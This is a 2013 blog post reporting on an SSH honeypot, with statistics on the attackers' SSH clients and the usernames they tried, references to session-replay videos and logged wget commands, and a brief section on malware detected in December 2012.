SSH Honeypotting – Bad guy in action.

SSH Server allows remote control and access the system. This article, I would like to present my analysis from captured files and activities by the attacker, which is trapped in our SSH-Honeypot.

In here also I am going to post several videos or playback screen of the attackers activity in my honeypot.


As few months back, I have launched my project  “Capturing Malware with Honeypot on Unifi

Basically this project is something I interested in and is able to publish this to public base on my finding.

An SSH server is a software program which uses the secure shell protocol to accept connections from remote computers. SFTP/SCP file transfers and remote terminal connection are popular use cases for a SSH server.

SSH Server has been used widely by private sectors and government – example SSH Server has been deployed in DNS Server, Mail Server and mostly Linux & UNIX servers.

I would like to start this post with statistic and results  I got from my honeypot.

Top 10 SSH clients

This vertical bar chart displays the top 10 SSH clients used by attackers during their hacking and total detected attempts.

SSH Client Version

Top 10 usernames

This vertical bar chart displays the top 10 usernames that attackers try when attacking the system.

Top Username Been Used

Play back screen – watch this:

This video shows the attacker activity after they managed to guess password from my running kippo.

Play back screen – From log file – Deleting history and logs file from the attacker.

On this video you will find few methods and commands executed by the attacker in order to remove and to hide their activities.

From log file – wget commands

The following table diplays the latest “wget” commands entered by attackers in the honeypot system.

Screen shot 2013-01-29 at 10.40.32 AM


Top detected malware on December 2012 from 500 computers in Klang Valley

Happy New Year guys! We are already in 2013, if we look back on security news a lot of cool and troll stories happened in 2012.

To conclude my security observation with collected logfiles from my sensors, here I published top detected malware on December 2012.

Top Malware December 2012